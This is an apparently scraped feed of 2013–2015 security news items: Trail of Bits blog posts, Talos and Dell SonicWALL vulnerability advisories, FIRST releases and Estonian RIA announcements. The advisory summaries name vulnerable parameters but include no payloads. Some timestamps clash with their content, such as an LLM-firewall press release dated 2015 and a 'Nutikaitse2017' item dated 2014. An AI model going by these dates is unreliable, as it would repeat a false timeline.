https://blog.trailofbits.com/2015/05/13/closing-the-windows-gap/
Pidgin libpurple MSN Message Parsing NULL Dereference Denial of Service Vulnerability
2015-05-11T00:00:00Z | 1431302400

https://talosintelligence.com/vulnerability_reports/VRT-2014-0201
Pidgin libpurple STUN Response Length NULL Write Vulnerability
2015-05-11T00:00:00Z | 1431302400

https://talosintelligence.com/vulnerability_reports/VRT-2014-0202
Lenny Zeltser on Protean Security Tactics
2015-05-10T13:57:39Z | 1431266259

We’re big fans of the SANS team and of Lenny Zelster. Lenny has discussed deception in his recent series of blog posts, and we highly recommend reading his history of deception. Here we extend a couple of his main arguments.

https://www.smokescreen.io/lenny-zeltser-on-protean-security-tactics/
RISKIJUHT 2015 on Riigi Infosüsteemi Amet
2015-05-07T21:00:00Z | 1431032400

Täna, 8. mail Tallinnas toimuval kümnendal riskijuhtimise aastakonverentsil anti esmakordselt välja auhind "Riskijuht 2015", mille pälvis Riigi Infosüsteemi Amet.

https://ria.ee/uudised/riskijuht-2015-riigi-infosusteemi-amet
Empire Hacking, a New Meetup in NYC
2015-05-05T18:50:58Z | 1430851858

Today we are launching Empire Hacking, a bi-monthly meetup that focuses on pragmatic security research and new discoveries in attack and defense. Empire Hacking is technical. We aim to bridge the gap between weekend projects and funded research. There won’t be any product pitches here. Come prepared with your best ideas. Empire Hacking is exclusive. […]

https://blog.trailofbits.com/2015/05/05/empire-hacking/
Tänasest on RIA peadirektor Taimar Peterkop
2015-05-03T21:00:00Z | 1430686800

Täna alustas Riigi Infosüsteemi Ameti (RIA) juhtimist peadirektor Taimar Peterkop, senine Kaitseministeeriumi õigus- ja haldusküsimuste asekantsler, kes vastutas haldusala info- ja kommunikatsioonitehnoloogia arendamise ning küberkaitse eest.

https://ria.ee/uudised/tanasest-ria-peadirektor-taimar-peterkop
Dell SonicWALL Secure Remote Access Products CVE-2015-2248 Cross Site Request Forgery Vulnerability
2015-05-01T15:59:00Z | 1430495940

Cross-site request forgery (CSRF) vulnerability in the user portal in Dell SonicWALL Secure Remote Access (SRA) products with firmware before 7.5.1.0-38sv and 8.x before 8.0.0.1-16sv allows remote attackers to hijack the authentication of users for requests that create bookmarks via a crafted request to cgi-bin/editBookmark. CVE: CVE-2015-2248 Last updated: March 12, 2018, 4:47 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2015-0001
Dell SonicWall SonicOS 'macIpSpoofView.html' Multiple Cross Site Scripting Vulnerabilities
2015-04-29T20:59:00Z | 1430341140

Multiple cross-site scripting (XSS) vulnerabilities in macIpSpoofView.html in Dell SonicWall SonicOS 7.5.0.12 and 6.x allow remote attackers to inject arbitrary web script or HTML via the (1) searchSpoof or (2) searchSpoofIpDet parameter. CVE: CVE-2015-3447 Last updated: March 9, 2018, 4:20 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2015-0002
FIRST leads development of education curriculum for global Computer Security Incident Response Teams (CSIRTs)
2015-04-29T18:17:00Z | 1430331420

FIRST is calling for community input on an updated CSIRT services list. Please review and provide comment at http://bit.ly/1Kw52dy!

https://www.first.org/newsroom/releases/20150429
Kaitseliidu pressiteade: Kaitseliit ja RIA allkirjastasid koostöölepingu
2015-04-01T21:00:00Z | 1427922000

Kaitseliidu (KL) ülem brigaadikindral Meelis Kiili ja Riigi Infosüsteemi Ameti (RIA) peadirektori kt Toomas Vaks kirjutasid täna alla koostöölepingule, mis sätestab Kaitseliidu kaasamise küberturvalisuse tagamisse.

https://ria.ee/uudised/kaitseliidu-pressiteade-kaitseliit-ja-ria-allkirjastasid-koostoolepingu
FIRST is calling for members of the incident response, security, and IT vendor communities to join forces and participate in a new Special Interest Group (SIG) on Vulnerability Coordination
2015-03-30T12:56:00Z | 1427720160

The Vulnerability Coordination SIG has been established to improve the way in which the increasingly multi-faceted and multi-stakeholder challenge of vulnerability information coordination is met, and to develop a common and consistent methodology for how coordination becomes more effective.

https://www.first.org/newsroom/releases/20150325
Ohtlike küberjuhtumite osakaal on aastaga kasvanud
2015-03-29T21:00:00Z | 1427662800

Riigi Infosüsteemi Ameti (RIA) koostatud küberturvalisuse kokkuvõte eelmisest aastast ütleb, et 2014. aasta ei erinenud 2013. aastast eriti intsidentide arvukuse poolest, ent selgelt oli märgata juhtumite mõju tõsinemist.

https://ria.ee/uudised/ohtlike-kuberjuhtumite-osakaal-aastaga-kasvanud
Scientific Events
2015-03-19T14:44:41Z | 1426776281

{slider=At CERIST} {loadposition position-37}{/slider}{slider=In Algeria} {loadposition position-7}    ARCHIVES  {/slider}{slider=International} {loadposition position-27}   ARCHIVES {/slider}

https://www.cerist.dz/index.php/en/actualites-evenements-2/903-actualites-evenementsen-2
WCAG 2.0 rakendusjuhised aitavad parandada juurdepääsu veebilehtede sisule
2015-03-08T22:00:00Z | 1425852000

Rakendusjuhised selgitavad veebilehtede tellijatele ja tegijatele, kuidas muuta veebid kasutajasõbralikumaks ja puuetega inimestele loetavamaks.

https://ria.ee/uudised/wcag-20-rakendusjuhised-aitavad-parandada-juurdepaasu-veebilehtede-sisule
Tänasest on ID-kaardi tarkvaras vaikimisi failivorming BDOC
2015-03-04T22:00:00Z | 1425506400

Täna avaldab RIA ID-kaardi tarkvara versiooni 3.10, milles on seatud vaikimisi digiallkirja vorminguks BDOC. Sellega asendab BDOC seni kasutusel olnud DDOC-vormingu.

https://ria.ee/uudised/tanasest-id-kaardi-tarkvaras-vaikimisi-failivorming-bdoc
The FIRST Fellowship program supports teams with national co-ordination responsibilities to be part of the FIRST community
2015-03-02T19:03:00Z | 1425322980

Applications are now being accepted through March 31, 2015 and details are available at http://www.first.org/global/fellowship or by contacting fellowship@first.org.

http://www.first.org/global/fellowship
Cytex Unveils AICenturion: The Industry’s First LLM Firewall with Integrated DLP Securing the Use of AI for Public and Private Sector Entities
2015-03-02T04:43:36Z | 1425271416

Washington D.C. / Austin TX – Cytex, Inc. a trailblazer in AI-driven cybersecurity, announced the launch of AICenturion, a groundbreaking LLM Firewall with Data Loss Prevention (DLP) capabilities. GenAI’s risks intensify as LLMs prevent enterprises from directly controlling their processes … Read More The post Cytex Unveils AICenturion: The Industry’s First LLM Firewall with Integrated DLP Securing the Use of AI for Public and Private Sector Entities appeared first on Cytex.

https://www.cytex.io/2015/03/02/cytex-unveils-aicenturion-the-industrys-first-llm-firewall-with-integrated-dlp-securing-the-use-of-ai-for-public-and-private-sector-entities/
Eestis usaldatakse riigi infosüsteeme Euroopa keskmisest enam
2015-02-10T22:00:00Z | 1423605600

Turvalise interneti päeva puhul avaldatud Eurobaromeetri küberturvalisuse küsitlusest selgub: 40 protsenti Eesti vastajatest tunneb muret, et riigiasutused ei hoia nende isikuandmeid turvaliselt, Euroopa Liidu keskmine protsent on 67. Andmete hoidmist võrgulehtedel üldiselt umbusaldab Eesti vastajatest 53 protsenti, Euroopa Liidus keskmiselt umbusaldab seda andmete säilitamise viisi 73 protsenti vastanutest.

https://ria.ee/uudised/eestis-usaldatakse-riigi-infosusteeme-euroopa-keskmisest-enam
Riigi infosüsteemi ameti peadirektor lahkub ametist
2015-01-06T22:00:00Z | 1420581600

Riigi infosüsteemi ameti (RIA) peadirektor Jaan Priisalu esitas majandus- ja taristuministrile avalduse lahkuda isiklikel põhjustel ametist alates 19. jaanuarist 2015.

https://ria.ee/uudised/riigi-infosusteemi-ameti-peadirektor-lahkub-ametist
The Foundation of 2015: 2014 in Review
2015-01-05T12:50:00Z | 1420462200

We need to do more to protect ourselves. 2014 overflowed with front-page proof: Apple, Target, JPMorgan Chase, etc, etc. The current, vulnerable status quo begs for radical change, an influx of talented people, and substantially better tools. As we look ahead to driving that change in 2015, we’re proud to highlight a selection of our […]

https://blog.trailofbits.com/2015/01/05/the-foundation-of-2015-2014-in-review/
CVSS v3 Preview 2 materials and updates are now available
2014-12-12T17:32:00Z | 1418405520

FIRST would like to thank the members of the CVSS SIG for their hard work and contributions to the community!

http://www.first.org/cvss/calculator/3.0
Nutiturvalisuse uuring: Seitse last kümnest saab nutitelefoni kasutada piiramatult
2014-12-08T22:00:00Z | 1418076000

Vaata Maailma pressiteade: Nutiseadmeid omab ja/või neid on võimalik kasutada 60% Eesti elanikkonnast alates kuuendast eluaastast, nii selgub täna esitletavast nutiseadmete turvalise kasutamise uuringust.

https://ria.ee/uudised/nutiturvalisuse-uuring-seitse-last-kumnest-saab-nutitelefoni-kasutada-piiramatult
Close Encounters with Symbolic Execution (Part 2)
2014-12-04T13:50:36Z | 1417701036

This is part two of a two-part blog post that shows how to use KLEE with mcsema to symbolically execute Linux binaries (see the first post!). This part will cover how to build KLEE, mcsema, and provide a detailed example of using them to symbolically execute an existing binary. The binary we’ll be symbolically executing […]

https://blog.trailofbits.com/2014/12/04/close-encounters-with-symbolic-execution-part-2/
Multiple Dell SonicWALL Products CVE-2014-8420 Multiple Remote Code Execution Vulnerabilities
2014-11-25T15:59:00Z | 1416931140

The ViewPoint web application in Dell SonicWALL Global Management System (GMS) before 7.2 SP2, SonicWALL Analyzer before 7.2 SP2, and SonicWALL UMA before 7.2 SP2 allows remote authenticated users to execute arbitrary code via unspecified vectors. CVE: CVE-2014-8420 Last updated: March 12, 2018, 5:25 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2014-0007
Close Encounters with Symbolic Execution
2014-11-25T13:50:54Z | 1416923454

At THREADS 2014, I demonstrated a new capability of mcsema that enables the use of KLEE, a symbolic execution framework, on software available only in binary form. In the talk, I described how to use mcsema and KLEE to learn an unknown protocol defined in a binary that has never been seen before. In the example, […]

https://blog.trailofbits.com/2014/11/25/close-encounters-with-symbolic-execution/
Pidgin libpurple Novell Protocol Multiple Denial of Service Vulnerabilities
2014-11-06T00:00:00Z | 1415232000

https://talosintelligence.com/vulnerability_reports/VRT-2014-0204
Pidgin libpurple Mxit Emoticon ASN Length Denial of Service Vulnerability
2014-11-06T00:00:00Z | 1415232000

https://talosintelligence.com/vulnerability_reports/VRT-2014-0203
Pidgin Theme/Smiley Untar Arbitrary File Write Vulnerability
2014-11-06T00:00:00Z | 1415232000

https://talosintelligence.com/vulnerability_reports/VRT-2014-0205
Eesti aitab arendada Ladina-Ameerika riikide küberturvalisust
2014-10-20T21:00:00Z | 1413838800

Riigi Infosüsteemi Ameti (RIA) peadirektori asetäitja küberturvalisuse alal Toomas Vaks ja Ameerika Riikide Organisatsiooni (ARO) multidimensioonilise julgeoleku peasekretär suursaadik Adam Blackwell allkirjastasid Washingtonis organisatsioonide koostöökokkuleppe.

https://ria.ee/uudised/eesti-aitab-arendada-ladina-ameerika-riikide-kuberturvalisust
Nutikaitse2017: Küberturvalisuse kuul tutvustatakse Mobiil-ID võimalusi
2014-10-05T21:00:00Z | 1412542800

Oktoober on Euroopa Liidus kuulutatud küberturvalisuse kuuks. NutiKaitse 2017 korraldab sel ajal Mobiil-ID teavituskampaania, sest nutiseadmetes on Mobiil-ID turvaline viis enda tuvastamiseks ja digiallkirja andmiseks.

https://ria.ee/uudised/nutikaitse2017-kuberturvalisuse-kuul-tutvustatakse-mobiil-id-voimalusi
Speaker Lineup for THREADS ’14: Scaling Security
2014-10-02T12:00:20Z | 1412251220

For every security engineer you train, there are 20 or more developers writing code with potential vulnerabilities. There’s no human way to keep up. We need to be more effective with less resources. It’s time to make security a fully integrated part of modern software development and operations. It’s time to automate. This year’s THREADS […]

https://blog.trailofbits.com/2014/10/02/threads-14-scaling-security/
We’re Sponsoring the NYU-Poly Women’s Cybersecurity Symposium
2014-09-29T12:50:11Z | 1411995011

Cyber security is an increasingly complex and vibrant field that requires brilliant and driven people to work on diverse teams. Unfortunately, women are severely underrepresented and we want to change that. Career Discovery in Cyber Security is an NYU-Poly event, created in a collaboration with influential men and women in the industry. This annual symposium […]

https://blog.trailofbits.com/2014/09/29/nyu-womens-cybersecurity-symposium/
RIA hoiatab aegunud tarkvara kasutamise eest
2014-09-25T21:00:00Z | 1411678800

Riigi Infosüsteemi Amet alustab koos partneritega teavituskampaaniat, mille eesmärk on vähendada aegunud tarkvara kasutamist Eestis. Selleks antakse mitmete riigiasutuste ja ettevõtete veebilehtede külastajatele soovitusi, kuidas uuendada oma arvutiprogramme ning neid hoiatatakse ohtude eest.

https://ria.ee/uudised/ria-hoiatab-aegunud-tarkvara-kasutamise-eest
Priisalu: Euroopas puudub ühtne pilt küberohtudest
2014-09-23T21:00:00Z | 1411506000

Riigi Infosüsteemi Ameti peadirektori Jaan Priisalu hinnangul on Euroopa riikide koostöö küberohtude ennetamisel ja tõrjumisel killustatud ning seetõttu puudub Euroopas ühtne pilt küberohtudest.

https://ria.ee/uudised/priisalu-euroopas-puudub-uhtne-pilt-kuberohtudest
Enabling Two-Factor Authentication (2FA) for Apple ID and DropBox
2014-09-02T21:00:37Z | 1409691637

In light of the recent compromises, you’re probably wondering what could have been done to prevent such attacks. According to some unverified articles it would appear that flaws in Apple’s services allowed an attacker to brute force passwords without any rate limiting or account lockout. While its not publicly known if the attacks were accomplished via brute force password guessing, there has been a lot of talk about enabling Two-Factor Authentication (2FA) across services that offer it. The two most popular services being discussed are iCloud and DropBox. While setting up 2FA on these services is not as easy as it should be, this guide will step you through enabling 2FA on Google, Apple ID and DropBox accounts. It’s a free way of adding an extra layer of security on top of these services which handle potentially sensitive information. What is Two-Factor Authentication? Username and password authentication uses a single factor to verify identity: something the user knows. Two-Factor authentication adds an extra layer of security on top of a username and password. Normally, the second factor is something only the real user has. This is typically a temporary passcode generated by a piece of hardware such as an RSA token, a passcode sent as an SMS to the user’s cell phone, or a mobile application that accomplishes the same function. With two-factor authentication, stealing a username and password won’t be enough to log in — the second factor is also required. This multi-factor authentication means an attacker will be required to compromise a user above and beyond password guessing or stealing a credentials database. An attacker would have to gain access to the source of the extra, unique and usually temporary information that makes up the 2FA.

https://blog.trailofbits.com/2014/09/02/enabling-two-factor-authentication-2fa-for-apple-id-and-dropbox/
Eesti ja Põhja-Iirimaa sõlmisid e-teenuste arendamise kokkuleppe
2014-08-27T21:00:00Z | 1409173200

Eesti ja Põhja-Iirimaa sõlmisid kokkuleppe kogemuste vahetamiseks ja ühisprojektide loomiseks riiklike e-teenuste arendamisel.

https://ria.ee/uudised/eesti-ja-pohja-iirimaa-solmisid-e-teenuste-arendamise-kokkuleppe
ReMASTering Applications by Obfuscating during Compilation
2014-08-20T12:50:45Z | 1408539045

In this post, we discuss the creation of a novel software obfuscation toolkit, MAST, implemented in the LLVM compiler and suitable for denying program understanding to even the most well-resourced adversary. Our implementation is inspired by effective obfuscation techniques used by nation-state malware and techniques discussed in academic literature. MAST enables software developers to protect […]

https://blog.trailofbits.com/2014/08/20/remastering-applications-by-obfuscating-during-compilation/
McSema is Officially Open Source!
2014-08-07T12:50:47Z | 1407415847

We are proud to announce that McSema is now open source! McSema is a framework for analyzing and transforming machine-code programs to LLVM bitcode. It supports translation of x86 machine code, including integer, floating point, and SSE instructions. We previously covered some features of McSema in an earlier blog post and in our talk at ReCON 2014. Our […]

https://blog.trailofbits.com/2014/08/07/mcsema-is-officially-open-source/
Education Initiative Spotlight: THREADS Call for Papers
2014-08-01T12:50:49Z | 1406897449

A 2-day conference exploring state-of-the-art advances in security automation. We would like to share the call for papers for THREADS 2014, a research and development conference that is part of NYU-Poly’s Cyber Security Awareness Week (CSAW). Trail of Bits is a founding sponsor of THREADS. The final deadline for submissions is October 6th, but you […]

https://blog.trailofbits.com/2014/08/01/education-initiative-spotlight-threads-call-for-papers/
Education Initiative Spotlight: Build it Break it
2014-07-30T06:10:03Z | 1406700603

We’re proud to be a sponsor of the first Build it Break it programming contest, run by the University of Maryland (UMD) and supported by one of our own employees and PhD student at the university, Andrew Ruef. Build it Break it is a “flipped CTF” where contestants both implement secure software and identify vulnerabilities in […]

https://blog.trailofbits.com/2014/07/30/education-initiative-spotlight-build-it-break-it/
Education Initiative Spotlight: CSAW Summer Program for Women
2014-07-28T12:50:00Z | 1406551800

At Trail of Bits we are proud of our roots in academia and research, and we believe it is important to promote cyber security education for students of every academic level. We recently sponsored a High School Capture the Flag (CTF) event, we released a CTF Field Guide, and we are a regular part of […]

https://blog.trailofbits.com/2014/07/28/education-initiative-spotlight-csaw-summer-program-for-women/
Multiple Dell SonicWALL Products 'node_id' parameter Cross Site Scripting Vulnerability
2014-07-24T14:55:00Z | 1406213700

Cross-site scripting (XSS) vulnerability in sgms/panelManager in Dell SonicWALL GMS, Analyzer, and UMA before 7.2 SP1 allows remote attackers to inject arbitrary web script or HTML via the node_id parameter. CVE: CVE-2014-5024 Last updated: March 12, 2018, 5:24 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2014-0006
Riigi IT-arhitekt: e-riigile pole Eestis mõistlikku alternatiivi
2014-07-21T21:00:00Z | 1405976400

Riigi infosüsteemi arhitekt Andres Kütt ütles eile õhtul Massachusettsi tehnoloogiainstituudis peetud kõnes, et e-valitsemise arendamisele puuduvad sisuliselt mõistlikud alternatiivid.

https://ria.ee/uudised/riigi-it-arhitekt-e-riigile-pole-eestis-moistlikku-alternatiivi
Dell SonicWALL Scrutinizer Multiple Security Vulnerabilities
2014-07-16T14:19:00Z | 1405520340

Multiple SQL injection vulnerabilities in Dell SonicWall Scrutinizer 11.0.1 allow remote authenticated users to execute arbitrary SQL commands via the (1) selectedUserGroup parameter in a create new user request to cgi-bin/admin.cgi or the (2) user_id parameter in the changeUnit function, (3) methodDetail parameter in the methodDetail function, or (4) xcNetworkDetail parameter in the xcNetworkDetail function in d4d/exporters.php. CVE: CVE-2014-4977 Last updated: March 12, 2018, 5:23 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2014-0005
Dell SonicWALL Scrutinizer Multiple Security Vulnerabilities
2014-07-16T14:19:00Z | 1405520340

Dell SonicWall Scrutinizer 11.0.1 allows remote authenticated users to change user passwords via the user ID in the savePrefs parameter in a change password request to cgi-bin/admin.cgi. CVE: CVE-2014-4976 Last updated: March 12, 2018, 5:23 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2014-0004
Trail of Bits Adds Mobile Security Researcher Nicholas DePetrillo to Growing Team
2014-07-15T12:50:09Z | 1405428609

New York, NY (July 15th, 2014)—Veteran computer security researcher Nicholas DePetrillo has joined Trail of Bits, the New York-based security company, as Principal Security Researcher. Trail of Bits Co-founder and CEO Dan Guido announced the hire today. DePetrillo brings the headcount of the firm, which was founded by a team of three in 2012, to […]

https://blog.trailofbits.com/2014/07/15/trail-of-bits-adds-mobile-security-researcher-nicholas-depetrillo-to-growing-team/
Avaliku sektori veebilehtede juurdepääsetavus on veidi paranenud
2014-07-06T21:00:00Z | 1404680400

Valmis Eesti avaliku sektori veebilehtede juurdepääsetavuse uuring, mille järgi on tulemused võrreldes 2010. aastaga veidi paranenud.

https://ria.ee/uudised/avaliku-sektori-veebilehtede-juurdepaasetavus-veidi-paranenud
RIA küberturvalisuse teenistuse 2013. aasta kokkuvõte
2014-07-02T21:00:00Z | 1404334800

RIA kokkuvõte 2013. aasta olulisematest sündmustest ja teemadest Eesti ja maailma küberjulgeolekus.

https://ria.ee/uudised/ria-kuberturvalisuse-teenistuse-2013-aasta-kokkuvote
A Preview of McSema
2014-06-23T13:00:21Z | 1403528421

On June 28th Artem Dinaburg and Andrew Ruef will be speaking at REcon 2014 about a project named McSema. McSema is a framework for translating x86 binaries into LLVM bitcode. This translation is the opposite of what happens inside a compiler. A compiler translates LLVM bitcode to x86 machine code. McSema translates x86 machine code into LLVM […]

https://blog.trailofbits.com/2014/06/23/a-preview-of-mcsema/
Riigi infosüsteemi arhitektuurinõukogu alustas tööd
2014-06-18T21:00:00Z | 1403125200

Esmaspäeval, 16. juunil kogunes esimest korda riigi infosüsteemi arhitektuurinõukogu.

https://ria.ee/uudised/riigi-infosusteemi-arhitektuurinoukogu-alustas-tood
We’ve Moved!
2014-06-04T18:19:40Z | 1401905980

Trail of Bits headquarters has moved! Located in the heart of the financial district, our new office features a unique design, cool modern decor, and an open layout that makes us feel right at home. With fast internet, well-appointed conference rooms, and comfortable work stations, we feel that this is a great place to grow […]

https://blog.trailofbits.com/2014/06/04/weve-moved/
FIRST TRANSITS Training in Djibouti
2014-06-04T16:51:00Z | 1401900660

Another successful AfricaCERT meeting draws to an end, training provided by both JPCERT/CC and FIRST (TRANSITS). We would like to congratulate everyone including the trainers, local host and the AfricaCERT on another successful event and a job well done!

https://www.first.org/newsroom/releases/20140604
Dear DARPA: Challenge Accepted.
2014-06-03T22:45:41Z | 1401835541

We are proud to have one of the only seven accepted funded-track proposals to DARPA’s Cyber Grand Challenge. Computer security experts from academia, industry and the larger security community have organized themselves into more than 30 teams to compete in DARPA’s Cyber Grand Challenge —- a first-of-its-kind tournament designed to speed the development of automated security […]

https://blog.trailofbits.com/2014/06/03/dear-darpa-challenge-accepted/
Eesti tänavuseks parimaks mobiilirakenduseks valiti Taxify
2014-06-02T21:00:00Z | 1401742800

Täna kuulutas majandus- ja taristuminister Urve Palo konkursi "Eesti parim mobiilirakendus 2014" üldvõitjaks taksotellimisrakenduse Taxify.

https://ria.ee/uudised/eesti-tanavuseks-parimaks-mobiilirakenduseks-valiti-taxify
Trail of Bits Releases Capture the Flag Field Guide
2014-05-20T13:00:33Z | 1400590833

Free Online Coursework Allows Students, Professionals to Build Essential Offensive Security Skills New York, NY (May 20, 2014)–Security researchers at Trail of Bits today introduced the CTF Field Guide (Capture the Flag), a freely available, self-guided online course designed to help university and high school students hone the skills needed to succeed in the fast-paced, […]

https://blog.trailofbits.com/2014/05/20/trail-of-bits-releases-capture-the-flag-field-guide/
Valminud on andmekeskuse turvanõuete juhend
2014-05-06T21:00:00Z | 1399410000

Riigi Infosüsteemi Ameti (RIA) tellimusel on valminud andmekeskuse turvanõuete juhend. See on mõeldud juhiseks eelkõige kõrge käideldavusnõuetega riiklike ning elutähtsa teenuse osutajate andmekogusid majutavate serveriruumide ja andmekeskuste planeerimiseks, ehitamiseks ja hooldamiseks.

https://ria.ee/uudised/valminud-andmekeskuse-turvanouete-juhend
ENISA juhised nutitelefonide rakenduste arendajatele
2014-05-05T21:00:00Z | 1399323600

Nüüd on eesti keeles olemas ENISA 2011. aastal valminud suunised nutitelefonide rakenduste arendajatele. Juhistes antakse nõu, kuidas teha turvalisemaid rakendusi.

https://ria.ee/uudised/enisa-juhised-nutitelefonide-rakenduste-arendajatele
Using Static Analysis and Clang To Find Heartbleed
2014-04-27T16:25:50Z | 1398615950

Background Friday night I sat down with a glass of Macallan 15 and decided to write a static checker that would find the Heartbleed bug. I decided that I would write it as an out-of-tree clang analyzer plugin and evaluate it on a few very small functions that had the spirit of the Heartbleed bug […]

https://blog.trailofbits.com/2014/04/27/using-static-analysis-and-clang-to-find-heartbleed/
Dell SonicWall EMail Security Appliance Multiple HTML Injection Vulnerabilities
2014-04-17T14:55:00Z | 1397746500

Multiple cross-site scripting (XSS) vulnerabilities in Dell SonicWALL Email Security 7.4.5 and earlier allow remote authenticated administrators to inject arbitrary web script or HTML via (1) the uploadPatch parameter to the System/Advanced page (settings_advanced.html) or (2) the uploadLicenses parameter in the License management (settings_upload_dlicense.html) page. CVE: CVE-2014-2879 Last updated: March 12, 2018, 2:10 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2014-0003
Riigi internetidomeenid said turvalaienduse
2014-04-16T21:00:00Z | 1397682000

Lisaks jaanuaris turvalaiendusega allkirjastatud riigiportaalile eesti.ee on DNSSECiga kaitstud ka valimised.ee, valitsus.ee, riigikantselei.ee ja ria.ee.

https://ria.ee/uudised/riigi-internetidomeenid-said-turvalaienduse
Dell SonicWALL NSA 2400 'stats/dashboard.jsp' Cross Site Scripting Vulnerability
2014-03-24T16:39:00Z | 1395679140

Cross-site scripting (XSS) vulnerability in the Dashboard Backend service (stats/dashboard.jsp) in SonicWall Network Security Appliance (NSA) 2400 allows remote attackers to inject arbitrary web script or HTML via the sn parameter. CVE: CVE-2014-2589 Last updated: March 12, 2018, 4:19 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2014-0002
Microsoft Windows FastFAT NumberOfFATs Buffer Overflow Vulnerability
2014-03-07T00:00:00Z | 1394150400

https://talosintelligence.com/vulnerability_reports/VRT-2014-0301
Introducing Javelin
2014-02-24T13:44:38Z | 1393249478

Javelin shows you how modern attackers would approach and exploit your enterprise. By simulating real-time, real-world attack techniques, Javelin identifies which employees are most likely to be targets of spearphishing campaigns, uncovers security infrastructure weaknesses, and compares overall vulnerability against industry competitors. Javelin benchmarks the efficacy of defensive strategies, and provides customized recommendations for improving […]

https://blog.trailofbits.com/2014/02/24/introducing-javelin/
Semantic Analysis of Native Programs with CodeReason
2014-02-24T03:59:13Z | 1393214353

Have you ever wanted to make a query into a native mode program asking about program locations that write a specific value to a register? Have you ever wanted to automatically deobfuscate obfuscated strings? Reverse engineering a native program involves understanding its semantics at a low level until a high level picture of functionality emerges. […]

https://blog.trailofbits.com/2014/02/23/semantic-analysis-of-native-programs-introducing-codereason/
Multiple Dell SonicWALL Products '/sgms/mainPage' Page Cross Site Scripting Vulnerability
2014-02-14T16:55:00Z | 1392396900

Cross-site scripting (XSS) vulnerability in mainPage in Dell SonicWALL GMS before 7.1 SP2, SonicWALL Analyzer before 7.1 SP2, and SonicWALL UMA E5000 before 7.1 SP2 might allow remote attackers to inject arbitrary web script or HTML via the node_id parameter in a ScreenDisplayManager genNetwork action. CVE: CVE-2014-0332 Last updated: March 12, 2018, 5:23 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2014-0001
African Business Review article by Maarten Van Horenbeeck 'Collaboration is vital to Africa's cyber-security tactics'
2014-02-13T10:54:00Z | 1392288840

In order for the continent to properly address the issue of cyber-crime and security its countries must come together to share technologies and experiences.

http://www.africanbusinessreview.co.za/technology/collaboration-is-vital-to-africas-cyber-security-tactics
Communications Africa article by Maarten Van Horenbeeck ‘Co-operation will secure Africa’s online future’
2014-01-29T14:35:00Z | 1391006100

A great deal of effort and money has been poured into increasing internet accessibility in Africa, writes Maarten van Horenbeeck, chair of the Forum for Incident Response and Security Teams.

http://www.communicationsafrica.com/security/co-operation-will-secure-africa-s-online-future
Pidgin libpurple Gadu Gadu HTTP Content-Length Integer Overflow Vulnerability
2014-01-26T00:00:00Z | 1390694400

https://talosintelligence.com/vulnerability_reports/VRT-2013-1001
Pidgin libpurple SIP/SIMPLE Content-Length Integer Overflow Vulnerability
2014-01-26T00:00:00Z | 1390694400

https://talosintelligence.com/vulnerability_reports/VRT-2013-1004
Pidgin for Windows URL Handling Remote Code Execution Vulnerability
2014-01-26T00:00:00Z | 1390694400

https://talosintelligence.com/vulnerability_reports/VRT-2013-1003
Pidgin libpurple Mxit Emoticon Name Length Integer Overflow Vulnerability
2014-01-26T00:00:00Z | 1390694400

https://talosintelligence.com/vulnerability_reports/VRT-2013-1002
Eestisse jõudis pahavara, mis muudab andmed püsivalt loetamatuks
2014-01-20T22:00:00Z | 1390255200

Eelmisel nädalal teavitati Riigi Infosüsteemi Ametit ja politseid esimestest CryptoLockeri juhtumitest Eestis. See pahavara muudab andmed loetamatuks ning lahtikrüpteerimise eest nõutakse bitimünte, raha MoneyPaki või teiste sarnaste teenuste kaudu.

https://ria.ee/uudised/eestisse-joudis-pahavara-mis-muudab-andmed-pusivalt-loetamatuks
Uuring: Eestis tuleb 2–5 aasta jooksul välja vahetada mitmed krüptolahendused
2014-01-08T22:00:00Z | 1389218400

Valminud on RIA tellitud ja Cybernetica ASi koostatud uuring krüptograafiliste algoritmide kasutusvaldkondadest ja elutsüklist. Uuring annab teaduskirjandusele ja rahvusvahelistele raportitele tuginedes mitmeid soovitusi ja juhiseid, kuidas võimalikke krüptograafiast lähtuvaid nõrkusi ennetada nii riigiasutustes kui ka erasektoris.

https://ria.ee/uudised/uuring-eestis-tuleb-2-5-aasta-jooksul-valja-vahetada-mitmed-kruptolahendused
SC Magazine article by Maarten Van Horenbeeck ‘Cooperation is key to Africa's security future’
2013-12-30T15:38:00Z | 1388417880

It has been a slow process, but the world is finally waking up to the reality of cyber-security in Africa.

http://www.scmagazineuk.com/cooperation-is-key-to-africas-security-future/article/326925/
Valmisid eestikeelsed juhised, mis aitavad parandada puuetega inimeste juurdepääsu veebilehtede sisule
2013-12-22T22:00:00Z | 1387749600

Avaliku sektori asutuste veebilehtede käideldavuse uuringud (2006, 2007, 2011) näitasid, et avaliku sektori asutuste veebilehed vastavad WCAG 2.0 suunistele vähesel määral. WCAG on rahvusvaheline suuniste kogum, mis aitab teha veebilehtede sisu puuetega inimestele loetavaks ja arusaadavamaks ning veebilehe üldiselt kasutajasõbralikumaks.

https://ria.ee/uudised/valmisid-eestikeelsed-juhised-mis-aitavad-parandada-puuetega-inimeste-juurdepaasu
FIRST TRANSITS Training in Cote'Ivoire
2013-12-19T13:21:00Z | 1387459260

Together with Jean Robert Hountomey of the AfricaCERT, FIRST organized a 2-day TRANSITS training in Cote d'Ivoire November 24th and 25th, colocated with the AfriNIC meeting and the JPCERT training.

https://www.first.org/newsroom/releases/20131219
Valitsus: Peaministrid Ansip ja Katainen: koostöö e-teenuste valdkonnas aitab meid palju elu praktilistes küsimustes
2013-12-10T22:00:00Z | 1386712800

Helsingi, 11. detsember 2013 – Eesti peaministri Andrus Ansipi ja Soome peaministri Jyrki Kataineni tänasel kohtumisel väljendati heameelt kahe riigi koostöö üle info- ja kommunikatsioonitehnoloogia valdkonnas. Eile sõlmisid peaministrid teadaolevalt maailma esimese digiallkirjastatud valitsustevahelise kokkuleppe, mille fookuses on ühine e-teenuste arendamine.

https://ria.ee/uudised/valitsus-peaministrid-ansip-ja-katainen-koostoo-e-teenuste-valdkonnas-aitab-meid-palju-elu
Digiallkirju saab anda rahvusvahelistele standarditele vastavas vormingus BDOC
